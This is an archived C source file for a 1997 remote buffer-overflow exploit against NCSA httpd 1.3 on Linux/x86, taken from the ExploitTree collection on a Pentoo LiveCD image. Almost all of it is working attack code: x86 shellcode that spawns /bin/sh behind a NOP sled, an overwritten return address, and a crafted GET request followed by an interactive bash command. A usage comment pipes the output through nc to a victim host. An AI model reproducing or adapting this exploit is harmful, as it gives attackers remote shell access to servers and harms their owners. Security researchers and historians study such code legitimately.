home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / webserver / ncsa / ncsahttpdexploit.c < prev   
Encoding:
C/C++ Source or Header  |  2005-02-12  |  2.0 KB  |  65 lines
  1. /*
  2.  * NCSA 1.3 Linux/intel remote xploit by savage@apostols.org 1997-April-23
  3.  *
  4.  * Special THANKS to: b0fh,|r00t,eepr0m,moxx,Fr4wd,Kore,EDevil and the rest of ToXyn !!!
  5.  *
  6.  * usage:
  7.  *    $ (hackttpd 0; cat) | nc victim 143
  8.  *                  |
  9.  *                  +--> usually from -1000 to 1000 (try steeps of 100)
  10.  */
  11.  
  12. #include <stdio.h>
  13.  
  14. unsigned char shell[] = {
  15. '/',0x90,0x90,0x90,
  16. 0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
  17. 0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
  18. 0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
  19. 0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
  20. 0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
  21. 0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
  22. 0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
  23. 0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
  24. 0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
  25. 0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
  26. 0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
  27. 0xeb,0x27,0x5e,0x31,0xed,0x31,0xc9,0x31,0xc0,0x88,0x6e,6,0x89,0xf3,0x89,0x76,
  28. 0x24,0x89,0x6e,0x28,0x8d,0x6e,0x24,0x89,0xe9,0x8d,0x6e,0x28,0x89,0xea,0xb0,0x0b,
  29. 0xcd,0x80,0x31,0xdb,0x89,0xd8,0x40,0xcd,0x80,0xe8,0xd4,0xff,0xff,0xff,
  30. 'b','i','n','/','s','h'
  31. };
  32.  
  33. char username[256+8];
  34.  
  35. void main(int argc, char *argv[]) {
  36.     int i,a;
  37.     long val;
  38.     
  39.     if(argc>1)
  40.         a=atoi(argv[1]);
  41.     else
  42.         a=0;
  43.     
  44.     strcpy(username,shell);
  45.     
  46.     for(i=strlen(shell);i<sizeof(username);i++)
  47.         username[i]=0x90; /* NOP */
  48.  
  49.     val = 0xbfff537c + 4 + a; 
  50.  
  51.     i=sizeof(username)-4;
  52.     {
  53.         username[i+0] = val & 0x000000ff;
  54.         username[i+1] = (val & 0x0000ff00) >> 8;
  55.         username[i+2] = (val & 0x00ff0000) >> 16;
  56.         username[i+3] = (val & 0xff000000) >> 24;
  57.     }
  58.     
  59.     username[ sizeof(username) ] = 0;
  60.     
  61.         printf("GET %s\n/bin/bash -i 2>&1;\n", username);
  62. }
  63.  
  64.  
  65.